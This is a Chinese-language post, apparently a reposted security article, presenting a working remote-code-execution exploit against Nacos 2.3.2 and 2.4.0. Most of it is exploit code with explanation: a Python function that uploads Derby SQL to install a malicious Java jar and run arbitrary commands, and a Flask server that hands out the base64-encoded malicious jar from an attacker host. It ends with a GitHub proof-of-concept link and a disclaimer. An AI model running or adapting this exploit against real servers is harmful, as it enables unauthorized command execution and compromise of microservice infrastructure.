Nacos 是 Alibaba 开源的一款用于微服务架构的注册中心和配置中心。它为开发人员提供了轻量级的服务发现和配置管理功能。
影响范围
nacos 2.3.2nacos 2.4.0其他版本不确定nacos 0day 需要登录到后才才能利用
代码分析
Service.py 漏洞利用函数
def exploit(target, command, service):removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')for i in range(0, sys.maxsize):id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8))post_sql = """CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)nCALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')nCREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'n""".format(id=id, service=service)option_sql = "UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{cmd}')n".format(id=id, cmd=command)get_sql = "select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/".format(id=id, cmd=command)files = {'file': post_sql}post_resp = requests.post(url=removal_url, files=files)post_json = post_resp.json()if post_json.get('message', None) is None and post_json.get('data', None) is not None:print(post_resp.text)get_resp = requests.get(url=derby_url, params={'sql': get_sql})print(get_resp.text)break
removal_url 和 derby_url:构建用于发送请求的URL。for i in range(0, sys.maxsize):无限循环,直到成功利用漏洞。id:生成一个随机字符串,用于标识SQL注入的payload。post_sql:构建SQL注入的payload,安装一个恶意的Java函数。option_sql:构建SQL语句,利用恶意函数执行命令。get_sql:构建SQL查询,执行命令并获取结果。requests.post:发送POST请求,上传恶意SQL。requests.get:发送GET请求,执行命令并获取结果。
主函数
if __name__ == '__main__':service = 'http://{host}:{port}/download'.format(host=config.server_host, port=config.server_port)target = 'http://127.0.0.1:8848'command = 'calc'target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or targetcommand = input('请输入命令,默认:calc:') or commandexploit(target=target, command=command, service=service)
service:构建下载恶意Jar文件的URL。target 和 command:从用户输入获取目标URL和要执行的命令。exploit:调用漏洞利用函数。
Exploit.py
payload 是一个Base64编码的字符串,表示一个压缩文件(ZIP文件)
创建Flask应用app = Flask(__name__)创建一个Flask应用实例。
定义路由和视图函数
python.route('/download')def download_file():data = base64.b64decode(payload)response = Response(data, mimetype="application/octet-stream")# response.headers["Content-Disposition"] = "attachment; filename=file.bin"return response
定义一个路由 /download,当用户访问这个URL时,调用 download_file 函数。
data:将Base64编码的 payload 解码为二进制数据。
response:创建一个HTTP响应对象,包含解码后的数据,并设置MIME类型为 application/octet-stream(表示二进制文件)。
response.headers["Content-Disposition"]:可以设置响应头,指示浏览器将内容作为附件下载,并指定文件名(这里被注释掉了)。返回响应对象。
Flask应用程序提供了一个简单的文件下载服务。用户访问 /download 路由时,服务器会返回一个解码后的二进制文件。这个文件最初是通过Base64编码存储在 payload 变量中的。应用程序的主机和端口信息从 config 模块中读取。
项目地址:
https://github.com/ayoundzw/nacos-poc
原文始发于微信公众号(TtTeam):0day - NACOS RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论